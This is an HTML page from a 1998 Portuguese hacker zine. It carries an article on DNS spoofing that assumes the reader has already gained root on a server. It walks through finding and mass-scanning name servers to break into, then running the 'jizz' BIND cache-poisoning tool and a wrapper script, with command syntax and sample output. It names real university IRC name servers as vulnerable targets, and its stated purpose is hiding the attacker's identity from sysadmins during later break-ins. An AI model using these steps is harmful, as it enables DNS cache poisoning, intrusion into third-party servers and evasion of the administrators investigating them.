<HTML>
<HEAD>
<TITLE>.pt zine 02 - SPOOF </TITLE>
</HEAD>
<BODY BGCOLOR="Black" TEXT="#000000" LINK="Green" VLINK="Red">
<IMG SRC="pt_small.gif" WIDTH=452 HEIGHT=81 BORDER=0>
<P>
<FONT SIZE="5" FACE="Arial" COLOR="#FFC639">
<B>SPOOF :</B><BR>
------------------------------------------------------ 
</FONT>
<BR>
<FONT SIZE="3" FACE="Arial" COLOR="#FFC639">
by CRE8OR, a KAOTIK MEMBER
<P>
"..spoof e' uma arte que ainda e' de leet por isso nao se escreve artigos..quem
 sabe sabe..quem nao sabe orienta se..." In IRC PTNET 2/1/98 by .......<P>
<P>
Estou aqui para falar de uma arte so que como nao sou leet nem nunca espero ser 
venho so de uma maneira simples, e rapida explicar como spoofar e para que serve o spoof.<P>
<P>
Ok, passemos ao que interessa =).<P>
<P>
Depois haxed o server termos o root termos limpado os logs, que pa quem nao sabe o tema veio<BR>
incluido na PTZine anterior, o que e podemos fazer com server apagamo-lo n&aacute;&aacute;&aacute;&aacute; isso so se faz<BR> 
se for ID =), deita-lo fora n&aacute;&aacute;&aacute;&aacute; isso s&oacute; se faz se MICRO$HIT,talvez verificarmos se o server<BR> 
que temos na nossa posse e um Name Server que em ingles se diz Domain Name Server mais conhecido<BR>
por DNS ou NS em portug&ecirc;s dito, e como se faz isso perguntam vo&ccedil;&ecirc;s.<BR>
<BR><BR>
Simples, :
<BR><BR> 
1-
<BR><BR>
na prompt do server escrevemos:   nslookup ip do server
<BR><BR>
Ex:
<BR><BR>
[root@ns /root]# nslookup 69.69.69.69
<BR><BR>
Server:  ns.sexo.pt<BR>
Address: ip
<BR><BR>
Name:    ns.sexo.pt<BR>
Address: ip    
<BR><BR>
Cool &eacute; um NS prim&aacute;rio =).<BR><BR>

2-<BR><BR>

fazemos um simples portscan e vemos se tem a porta do named a correr que &eacute; a porta 53<BR>
MAS mesmo temos de verificar se &eacute; um NS prim&aacute;rio fazendo o acima referido.Est&aacute; a correr c00l<BR>
<BR>
Ok, acabamos de ter um Name server na nossa m&atilde;o o que fazemos agora apagamo-lo n&aacute;&aacute;&aacute;&aacute;,<BR>
deita-lo fora n&aacute;&aacute;&aacute;&aacute;, brincamos SIM SIM SIM.<BR>
<BR>
E como brincamos?<BR><BR>

Simples spoofamos.<BR><BR>

E caso n&oacute;s queir&aacute;mos um Name Server e nao termos?<BR><BR>

Facil fazemos mass scans em busca de Name Servers prontinhos a serem haxed. =)<BR>
Com nslookups, ou uma maneira mais simples com o comando host.<BR><BR>
Ok, e como usar o comando host, vejam o exemplo.<BR>
<BR>
Ex:

host -l -v -t ns pt <BR><BR>

desta maneira obtemos uma lista de todos os NS exitentes em Portugal,<BR>
depois e s&oacute; mudar o pais e para obter NS de outros paises,e tentar entrar<BR>
la dentro e sacar o tao alvejado root.<BR><BR>

Nota: <BR><BR>

para quem nao tem  a lista dos paises que tive-se sacado a PTZINE1.0<BR>
ou que a saque que ainda vai tempo.E para quem tambem nao sabe entrar nao tendo <BR>
shell no server na ZINE1.0 tambem vem um artigo para como entrar sem shell.<BR>
<BR>
Pra facilitar a vida ponham antes:<BR><BR>

host -l -v -t ns pt > nspt<BR><BR>

assim todos os NS seram mandados para o fichereiro nspt.<BR><BR>

E porque spoofar?<BR><BR>

Simples se spoofarmos o nosso host nos proximos hacks que viermos a fazer teremos<BR>   
menos riscos de que o sysadmin do server que estamos a haxar chegue a n&oacute;s pois em caso<BR> 
de algum modo n&oacute;s tenhamos esquecido de apagar algum log o que nunca acontece :/,<BR> 
ele ficaria com um host do genero: YOU.HAVE.BEEN.HAXE isso caso nos nos tenhamos<BR> 
spoofado com esse host.<BR><BR>

E como Spoofar ( A GRANDE PERGUNTA ) ???<BR><BR>

De varias maneiras ( penso eu de que ), e que existem varios programas em C prontos <BR>
a ser usados para spoof do nosso host o que eu vou referir aki o Jizz.<BR> 
Que e o normalmente mais usado na arte do spoof.<BR> 
<BR><BR>
Aki esta o codigo dele.<BR><BR>

<A HREF="jizz.c">Jizz.c</a><BR><BR>

Ok compilam aqui o nosso amigo jizz.c no Name Server e veem se o gajo bule.<BR>
Se ele tiver a bulir teram algo do genero:<BR><BR>

jizz <beginhost> <fakenshost> <fakensip> <fakensdom> <spoofedip> <spoofedhost><BR><BR>
   
beginhost  :     requested to initiate false caching, ex:begin.ib6ub9.com<BR>
fakenshost :     server name to answer false PTR's, ex: ns.ib6ub9.com<BR>
fakensip   :     IP of server name to answer false PTR's, ex:205.160.29.19<BR>
fakensdom  :     domain name false name server controls, ex:ib6ub9.com<BR>
spoofedip  :     IP of machine you want to spoof from, ex:204.154.2.93<BR>
spoofedhost:     name you want to spoof, ex: teak.0wns.j00<BR><BR>

So que usar assim o jizz seria um suicido por completo e isso porque<BR>
teriamos de andar a mexer no named e a fazer kills ao jizz e isso que<BR>
verdade seja dita nao e coisa simples.<BR>
Pra isso existe um pekeno script chamado jizz.sh que no facilita a vida.<BR>
E que torna o spoof mais simples de ser feito.<BR><BR>

<A HREF="jizz.sh">Jizz.sh</a><BR><BR>

Bem, ja temos o jizz.sh ja temos o jizz.c compilado so falta o ver o nosso<BR>
spoof a bulir =).<BR><BR>

Pra isso fazemos:<BR><BR>

./jizz.sh <beginhost> <fakenshost> <fakensip> <fakensdom> <spoofedip> <spoofedhost><BR><BR>

So que tar sempre a fazer esta porra para cada spoof funix iria dar uma tabalheira descumunal =)<BR>
isto se o NS for lento o que normalmente nao e'.<BR>
Pra isso cria-se uma ficheiro com o nome por exemplo spoof.<BR><BR>
E pomos la dentro:<BR><BR>

./jizz.sh $RANDOM.ns ns ipns hostns $1 $2<BR><BR>

e fazemos :   chmod +x spoof<BR><BR>

Legenda:<BR><BR>

ns : o nome do name server<BR>
ipns: como diz metemos o ip do name server<BR>
hostns: o domain do name server<BR>
$1: ira ser explicado<BR>
$2: ira ser explicado<BR><BR>

Ex:<BR><BR>

Digamos que eu crio o ficheiro spoof para o Name Server-----> ns.sexo.pt<BR><BR>

Ao editar o ficheiro spoof eu iria por:<BR><BR>

./jizz.sh $RANDOM.ns.sexo.pt ns.sexo.pt 69.69.69 sexo.pt $1 $2<BR><BR>

salva-va e fazia: chmod +x spoof<BR><BR>

e corria o file spoof so que nao iria correr so spoof iria correr<BR><BR>

./spoof meuIP FakeHost<BR><BR>

para isso e que foi colocadao as duas vari&aacute;veis na file spoof pois o resto ira ser sempre<BR>
igual o nosso ip e o fake host e que irarm mudar entao em vez de ir sempre escrever:<BR><BR>

./jizz.sh <beginhost> <fakenshost> <fakensip> <fakensdom> <spoofedip> <spoofedhost><BR><BR>

o ficheiro spoof facilitanos a vida.<BR>
So que ainda nao acabou aki depois de corrermos o spoof como foi explicado<BR>
em cima ira aparecer.<BR><BR>

eu iria correr por ex:<BR><BR>

./spoof 208.153.64.158 sexo.pt<BR><BR>

e iria surgir <BR><BR>

ns.sexo.pt IN 69.69.69<BR>
sexo.pt IN NS ns.sexo.pt<BR>
teleporka.pt IN A 208.153.64.158<BR>
69.69.69.IN-ADDR.ARPA IN PTR teleporka.pt<BR>
Name Server To Cache Fake Host On:<BR><BR>      

ok onde est&aacute; Name Server To Cache Fake Host On iremos por o Name Server do host onde queremos<BR>
que o n&oacute;s fiquemos spoofed. Digamos por explemplo que queriamos spoofar no IRC uma coisa bulgar<BR>
mas mais simples de ser explicada e de f&aacute;cil compreen&ccedil;&atilde;o.<BR><BR>

Pra isso irei por NS de servers de irc que seja possivel spoofar sim porque nem todos os servers<BR>
admitem o nosso spoof poes ele teem de sofrer da BIND cache vuln.E isso so na pratica se sabe,<BR>
e como ja sei que que os NS dos servers de irc do iscte, da ubi e da ualg sofrem disso irei spoofar<BR>
num deles. Colocando o NS server ao que eu prentendo:<BR><BR>

irc.iscte.pt -------> NS: iscte.iscte.pt<BR>
irc.ubi.pt   -------> NS: usbistb.ubi.pt<BR>
irc.ualg.pt  -------> NS:dns.si.ualg.pt<BR><BR>

Entao: faziamos:<BR><BR> 

./spoof 208.153.64.158 telepac.sucks.pt <BR><BR>

jizz: no process killed<BR>
jizz .01b -- dns spoofer (BIND cache vuln.)<BR>
by nimrood<BR><BR>

IN 69.69.69<BR>
sexo.pt IN NS ns.sexo.pt<BR>
telepac.sucks.pt IN A 208.153.64.158<BR>
69.69.69.IN-ADDR.ARPA IN PTR telepac.sucks.pt<BR>
Name Server To Cache Fake Host On:iscte.iscte.pt    ------> USEI O DO irc.iscte.pt<BR>
Default Server:  sexo.pt<BR>
Address:  168.77.18.2<BR><BR>

> Default Server:  iscte.iscte.pt<BR>
Address:  193.136.188.1<BR><BR>

> > Server:  iscte.iscte.pt<BR>
Address:  193.136.188.1<BR><BR>

...... ( aqui aparece bue da lixo normalmente )<BR><BR>

sexo.pt  internet address = 208.153.64.158 <BR>
208.153.64.158.IN-ADDR.ARPA     name = ns.sexo.pt<BR>
ns.sexo.pt       internet address = 208.153.64.158<BR> 
sexo.pt  nameserver = ns.sexo.pt<BR><BR>

Ok isto ir&aacute; significar que o spoof ficou feito =).<BR><BR>
Depois,<BR><BR>

Carregas:   " . " e ir&aacute; dizer qualquer coisa do tipo Killing Named<BR><BR> 

Ok tudo pronto buga entrar para o IRC.<BR><BR>

Entras no server :   irc.iscte.pt<BR><BR>

e fazes um whois a ti pr&oacute;prio e ir&aacute;s reparar que o teu host &eacute; do g&eacute;nero: <BR><BR>

--->  Zbr@telepac.sucks.pt<BR><BR> 

E sinal que deu &aacute;s mil maravilhas .....<BR><BR>

Depois e s&oacute; dependendo da situa&ccedil;&atilde;o &eacute; s&oacute; mudar o lugar onde queres que o spoof <BR>
fique mudando o name server. E expliquei para o IRC poes &eacute; de mais simples compreen&ccedil;&atilde;o.<BR>
<BR>
Por isso nao pensem que spoof &eacute; facil pelo contrario o fruto mais apetecido e o mais dificil<BR>
por boa sorte espero que tenha tornado as coisas mais simples e claras.<BR><BR>

Se ouver duvidas contactar qualquer um dos membros da KAOTIK TEAM.
<P>
Special thaks to :  <BR><BR>

All members of the KAOTIK Team<BR><BR>

DarkTiger: nao a palavras pa descreber este tipo =)<BR><BR>

Ven0m-X: que ei-de dizer melhor do que ele s&oacute; a SANDRA BULLOCK<BR><BR>
<P>
<P>I�m CRE8OR, Master of Cre8ions, a KAOTIK MEMBER </P>  
<P>     <IMG SRC="cre8orkk.jpg" BORDER=0></P>
<P>Mail: CRE8OR@BIGFOOT.COM
<P>Visit: PTNET channel #hackers 
<P>CRE8OR I�ll be back with more =).
</FONT>
</BODY>
</HTML>
